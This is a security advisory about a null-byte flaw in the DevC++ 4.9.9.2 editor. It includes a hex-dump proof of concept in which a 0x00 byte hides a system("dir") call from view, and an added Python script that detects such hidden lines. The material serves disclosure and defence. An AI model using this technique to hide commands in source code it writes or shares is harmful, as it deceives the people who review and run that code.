
DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW (by rgod)


UPDATE TO HTTP://RGOD.ALTERVISTA.ORG/SYN.HTML, which explains the obfuscation
flaw in the SynEdit editor component that DevC++ uses

exploit: an attacker can craft a malicious source file that uses a null byte
(0x00, %00) to obfuscate code and hide malicious instructions from the victim
user

poc:

this is a hexadecimal dump of the poc.cpp file (non-printable bytes are shown as
'.' in the right-hand column; note the 00 byte at offset 0x5a, right before the
hidden system() call):

00000000: 23 69 6e 63 6c 75 64 65 20 3c 69 6f 73 74 72 65  #include <iostre
00000010: 61 6d 2e 68 3e 0d 0a 23 69 6e 63 6c 75 64 65 20  am.h>..#include 
00000020: 3c 73 74 64 6c 69 62 2e 68 3e 0d 0a 0d 0a 69 6e  <stdlib.h>....in
00000030: 74 20 6d 61 69 6e 28 29 0d 0a 7b 0d 0a 20 20 63  t main()..{..  c
00000040: 6f 75 74 20 3c 3c 20 22 48 65 6c 6c 6f 20 57 6f  out << "Hello Wo
00000050: 72 6c 64 21 22 3b 0d 0a 20 20 00 73 79 73 74 65  rld!";..  .syste
00000060: 6d 20 28 22 64 69 72 22 29 3b 20 0d 0a 20 20 72  m ("dir"); ..  r
00000070: 65 74 75 72 6e 20 30 3b 0d 0a 7d 20 0d 0a 0d 0a  eturn 0;..} ....

when you open it in DevC++, it looks like this (the line containing the null
byte is rendered as empty):

#include <iostream.h>
#include <stdlib.h>

int main()
{
  cout << "Hello World!";
  
  return 0;

}

but when a victim user compiles and executes it, the hidden line

system ("dir");

is executed as well, even though the editor never showed it
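A defensive check for this class of obfuscation, added here and not part of rgod's advisory: it scans a source file's raw bytes for NUL, reports what an editor that stops rendering at the first NUL would display versus what follows the NUL, and is run on the poc.cpp bytes from the dump above (the `compiler_view` helper assumes the compiler simply drops NUL bytes, which is what the advisory's result implies).

```python
# Bytes of poc.cpp exactly as given in the advisory's hex dump.
POC_CPP = (
    b"#include <iostream.h>\r\n"
    b"#include <stdlib.h>\r\n"
    b"\r\n"
    b"int main()\r\n"
    b"{\r\n"
    b"  cout << \"Hello World!\";\r\n"
    b"  \x00system (\"dir\"); \r\n"   # the 0x00 byte hides the rest of the line
    b"  return 0;\r\n"
    b"} \r\n"
    b"\r\n"
)


def find_hidden_code(data: bytes):
    """Return (line_no, column, visible, hidden) for every line holding a NUL.

    visible is the part an editor that truncates at the first NUL shows;
    hidden is what follows the NUL (NULs removed) and still reaches the compiler.
    """
    findings = []
    for line_no, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        nul = line.find(b"\x00")
        if nul == -1:
            continue
        visible = line[:nul].decode("latin-1")
        hidden = line[nul:].replace(b"\x00", b"").decode("latin-1")
        findings.append((line_no, nul + 1, visible, hidden))
    return findings


def editor_view(data: bytes) -> str:
    """Emulate the flawed rendering: each line is cut at its first NUL."""
    out = []
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        nul = line.find(b"\x00")
        out.append((line if nul == -1 else line[:nul]).decode("latin-1"))
    return "\n".join(out)


def compiler_view(data: bytes) -> str:
    """What a compiler that ignores NUL bytes parses (assumption, see lead-in)."""
    return data.replace(b"\x00", b"").replace(b"\r\n", b"\n").decode("latin-1")


if __name__ == "__main__":
    for line_no, col, _visible, hidden in find_hidden_code(POC_CPP):
        print(f"poc.cpp:{line_no}:{col}: NUL byte hides: {hidden!r}")
```

Running the script on poc.cpp reports line 7, column 3, with the hidden text `system ("dir"); `.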

rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it

original advisory: http://rgod.altervista.org/devcpp.html